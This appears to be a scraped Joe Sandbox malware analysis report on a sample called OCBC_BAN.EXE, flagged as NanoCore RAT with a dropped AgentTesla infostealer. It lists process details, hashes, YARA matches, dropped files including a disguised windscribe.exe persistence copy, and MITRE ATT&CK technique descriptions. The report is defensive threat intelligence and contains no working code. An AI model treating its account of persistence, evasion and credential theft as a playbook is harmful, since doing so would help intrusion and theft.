File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5556, Parent PID: 3616

General

Target ID:	6
Start time:	14:47:41
Start date:	10/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exePID: 4804, Parent PID: 3616

General

Target ID:	7
Start time:	14:47:41
Start date:	10/05/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 10
Imagebase:	0xea0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Pubrtkzyqpdcef1.exePID: 5604, Parent PID: 4500

General

Target ID:	9
Start time:	14:47:53
Start date:	10/05/2022
Path:	C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
Imagebase:	0xe30000
File size:	213504 bytes
MD5 hash:	4AD411F172F9362BB859CD369E5F3F8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, Metadefender, Browse Detection: 85%, ReversingLabs
Reputation:	low

Analysis Process: OCBC_BAN.EXEPID: 3524, Parent PID: 4500

General

Target ID:	12
Start time:	14:48:24
Start date:	10/05/2022
Path:	C:\Users\user\Desktop\OCBC_BAN.EXE
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\OCBC_BAN.EXE
Imagebase:	0x630000
File size:	25088 bytes
MD5 hash:	BE7BB1D25F6FB1B424AB8B54DC3971D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OCBC_BAN.EXE

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OCBC_BAN.EXE.log

C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
OCBC_BAN.EXE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre